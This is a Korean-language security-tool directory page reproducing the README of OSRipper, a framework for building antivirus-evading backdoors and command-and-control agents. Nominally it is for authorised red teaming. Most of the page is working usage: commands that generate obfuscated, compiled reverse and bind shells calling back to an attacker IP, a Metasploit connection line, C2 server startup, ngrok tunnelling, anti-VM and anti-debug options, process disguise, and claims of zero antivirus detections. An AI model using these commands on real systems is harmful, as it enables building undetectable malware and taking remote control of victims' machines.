Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
OSRipper — AV 우회 크로스 플랫폼 백도어 및 크립터 프레임워크, 통합 경량 웹UI 포함 | Kitploit
도구/GitHubGitHub/noahoksuz/osripper
Exploit FrameworksPayload GenerationIDS/IPS EvasionPost-ExploitationPenetration TestingCommand and ControlLearning & EducationRed Teaming
GitHubnoahoksuz/osripper

OSRipper

AV 우회 크로스 플랫폼 백도어 및 크립터 프레임워크, 통합 경량 웹UI 포함

저장소 보기
32850757개월 전Kitploit 검토 완료
웹사이트

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

OSRipper v0.4.2

OSRipper Logo

CodeFactor Python Version License Platform

크로스 플랫폼 고급 페이로드 생성기 및 암호화 도구 (FUD 기능 포함)

기능 • 빠른 시작 • 웹 UI • 페이로드 유형 • 문서


개요

OSRipper는 공인된 침투 테스트 및 레드팀 운영을 위해 설계된 정교하고 완전히 탐지되지 않는 (FUD) 백도어 생성기이자 암호화 도구입니다. 고급 회피 기법, 다양한 페이로드 유형, 손상된 시스템을 관리하기 위한 현대적인 웹 기반 C2 인터페이스를 갖추고 있습니다.

주요 특징

  • 완전 탐지 불가 (FUD) - 고급 회피 기술로 최신 안티바이러스 솔루션 우회
  • 웹 기반 C2 인터페이스 - 활성 세션 관리를 위한 현대적인 대시보드
  • 다양한 페이로드 유형 - 바인드 셸, 리버스 셸, DoH C2, HTTPS C2 등
  • 다중 계층 난독화 - 무작위 변수를 사용한 표준 및 고급 난독화
  • 바이너리 컴파일 - 페이로드를 독립 실행형 실행 파일로 컴파일
  • 암호화된 통신 - SSL/TLS 및 인증서 고정 HTTPS C2 채널
  • 은밀성 기능 - VM 탐지, 안티 디버깅, 프로세스 위장

기능

페이로드 생성

페이로드 유형설명사용 사례
바인드 셸대상 머신에서 포트 열기역방향 연결이 차단된 경우 직접 접근
리버스 TCP MeterpreterSSL/TLS 암호화 역방향 연결표준 침투 테스트
DNS-over-HTTPS C2은밀한 DoH 기반 명령 및 제어네트워크 제한 우회
HTTPS C2인증서 고정 HTTPS C2안전하고 인증된 C2 채널
스테이지드 페이로드다단계 웹 전달강화된 은밀한 배포
커스텀 코드 암호화기모든 Python 스크립트 난독화맞춤형 페이로드 암호화

회피 기술

  • 고급 난독화 - 무작위 변수를 사용한 다중 계층 코드 인코딩
  • 향상된 난독화 - 안티 디버그, VM 탐지, 정크 코드 삽입
  • 안티-VM 탐지 - 샌드박스 및 가상 머신 회피
  • 은밀한 지연 - 무작위 시작 지연 (5~15초)
  • 프로세스 위장 - 정상 시스템 프로세스로 위장
  • 서명 무작위화 - 모든 페이로드는 고유함

웹 UI 기능

  • 세션 대시보드 - 모든 활성 C2 세션 보기
  • 대화형 터미널 - 웹 인터페이스를 통해 명령 실행
  • 페이로드 생성기 - 웹 UI에서 직접 페이로드 생성
  • 세션 관리 - 시스템 정보, 명령 기록 보기 및 세션 관리
  • 실시간 업데이트 - 실시간 명령 실행 및 응답 보기

고급 기능

  • Ngrok 통합 - 동적 IP를 위한 자동 터널 생성
  • 인증서 고정 - 인증서 검증으로 안전한 HTTPS C2
  • 세션 지속성 - 재시작 시 연결 유지
  • 명령 대기열 - 오프라인 에이전트를 위한 명령 대기열
  • 응답 파싱 - 명령 출력 자동 파싱

빠른 시작

설치

# 저장소 클론
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper

# 종속성 설치
pip3 install -r requirements.txt

# 패키지 설치
pip3 install -e .

중요 — 선택적 기능(ngrok, 바이너리 컴파일)을 위해 설정 실행:
많은 시스템(특히 외부 관리 파이썬 환경의 Linux)에서는 내장된 설정을 실행하여 선택적 종속성이 OSRipper 자체 venv에 설치되도록 해야 합니다. 설치 후 한 번만 실행하십시오.

osripper-cli setup

이 명령은 ~/.local/share/osripper/venv를 생성하고, pyngrok, nuitka, sandboxed를 설치하며, 이후 osripper / osripper-cli 실행 시 자동으로 이를 사용합니다. 이 단계를 거치지 않으면 --ngrok 및 --compile 사용 시 설정을 실행하라는 메시지가 표시됩니다. venv 대신 시스템/사용자 pip 설치를 선호하는 경우에만 osripper-cli setup --system을 사용하십시오.

기본 사용법

대화형 모드:

osripper
# 또는
python3 -m osripper

명령줄:

# 리버스 셸 생성
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile

# DoH C2 페이로드 생성
osripper-cli doh -d example.com --obfuscate --compile

웹 UI:

# 웹 UI와 함께 C2 서버 시작
python -m osripper.c2.server example.com --port 5000

# http://localhost:5000 에서 대시보드 접근

웹 UI

OSRipper는 손상된 시스템 관리를 위한 현대적인 웹 기반 C2 인터페이스를 포함합니다.

기능

  • 대시보드 - 모든 활성 세션 개요
  • 세션 관리 - 시스템 정보 보기 및 명령 실행
  • 페이로드 생성기 - 웹 인터페이스를 통해 DoH 및 HTTPS 페이로드 생성
  • 명령 기록 - 실행된 모든 명령 및 응답 추적
  • 실시간 업데이트 - 실시간 명령 실행 및 응답 보기

C2 서버 시작

# 기본 사용법
python -m osripper.c2.server example.com

# HTTPS 사용
python -m osripper.c2.server example.com --https

# 사용자 정의 포트
python -m osripper.c2.server example.com --port 8080

# 사용자 정의 인증서 사용
python -m osripper.c2.server example.com --https --cert server.crt --key server.key

웹 UI 접근

서버가 실행 중이면 다음 주소에서 대시보드에 접근할 수 있습니다:

  • HTTP: http://localhost:5000
  • HTTPS: https://localhost:5000 (활성화된 경우)

페이로드 유형

1. 바인드 셸 백도어

대상 머신에서 포트를 열고 연결을 기다립니다.

osripper-cli bind -p 4444 --obfuscate --compile

연결:

msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'

2. 리버스 TCP Meterpreter

SSL/TLS로 암호화된 역방향 연결.

osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile

3. DNS-over-HTTPS C2

DNS-over-HTTPS 프로토콜을 사용하는 은밀한 C2 채널. 많은 네트워크 제한을 우회합니다.

# 페이로드 생성
osripper-cli doh -d example.com --obfuscate --compile

# C2 서버 시작
python -m osripper.c2.server example.com

기능:

  • 은밀한 DNS 기반 통신
  • 세션 관리를 위한 웹 UI
  • 자동 세션 지속성
  • 오프라인 에이전트를 위한 명령 대기열

4. HTTPS C2 (인증서 고정)

인증 고정을 통한 안전한 HTTPS C2.

# 페이로드 생성 (웹 UI 또는 CLI를 통해)
# HTTPS로 C2 서버 시작
python -m osripper.c2.server example.com --https

# 인증서 지문 가져오기
curl http://localhost:5000/api/cert-fingerprint

기능:

  • 보안을 위한 인증서 고정
  • 암호화된 HTTPS 통신
  • 웹 UI 통합
  • 세션 관리

5. 스테이지드 페이로드

강화된 은밀성을 위한 다단계 웹 전달.

osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate

6. 커스텀 코드 암호화기

모든 Python 스크립트를 난독화하고 암호화합니다.

osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile

명령줄 인터페이스

공통 옵션

옵션설명
--obfuscate다중 계층 난독화 활성화
--enhanced향상된 난독화 (안티 디버그, VM 탐지)
--compile독립 실행형 바이너리로 컴파일
--icon PATH컴파일된 바이너리의 사용자 정의 아이콘
--delay무작위 시작 지연 추가 (5~15초)
--output, -o NAME출력 파일명
--quiet, -q조용한 모드 (최소 출력)

예제

# 전체 기능을 갖춘 리버스 셸
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --obfuscate --enhanced --compile --icon app.ico --delay

# 모든 기능을 갖춘 DoH C2
osripper-cli doh -d example.com \
  --obfuscate --enhanced --compile --delay

# 맞춤 스크립트 암호화
osripper-cli custom --script malware.py \
  --obfuscate --enhanced --compile

# 동적 IP를 위한 ngrok 사용
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

탐지 결과

최신 VirusTotal 스캔

  • Python 페이로드: 0/68 탐지율
  • 컴파일된 바이너리: 0/68 탐지율

antiscan 결과

Antiscan Results


아키텍처

┌─────────────────┐
│   생성된        │
│   바이너리      │
└─────────────────┘
         │
         │ 실행
         ▼
┌──────────────────┐
│ 난독화된         │
│ 드로퍼           │
└──────────────────┘
         │
         │ HTTP/HTTPS/DoH
         ▼
┌─────────────────┐
│                 │
│   C2 서버       │
│   (웹 UI)       │
│                 │
└─────────────────┘
         │
         │ 명령/응답
         ▼
┌─────────────────┐
│   에이전트      │
│   실행          │
└─────────────────┘

스크린샷

메인 인터페이스

웹 UI 대시보드

Web UI Dashboard


고급 설정

Ngrok 통합

# ngrok으로 페이로드 생성
osripper-cli reverse --ngrok -p 4444

# 터널 설정 안내를 따름
# 실행: ngrok tcp 4444

사용자 정의 아이콘

osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --compile --icon /path/to/icon.ico

난독화 수준

표준 난독화:

  • 다중 계층 인코딩
  • 변수 무작위화
  • 코드 구조 난독화

향상된 난독화:

  • 모든 표준 기능 포함
  • 안티 디버깅 기술
  • VM 탐지
  • 정크 코드 삽입
  • 고급 회피
# 표준
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate

# 향상된
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced

HTTPS C2 설정

# 1. HTTPS로 C2 서버 시작
python -m osripper.c2.server example.com --https

# 2. 인증서 지문 가져오기
curl http://localhost:5000/api/cert-fingerprint

# 3. 지문으로 페이로드 생성 (웹 UI를 통해)
# 또는 페이로드 생성 시 지문 사용

문서

도구 다운로드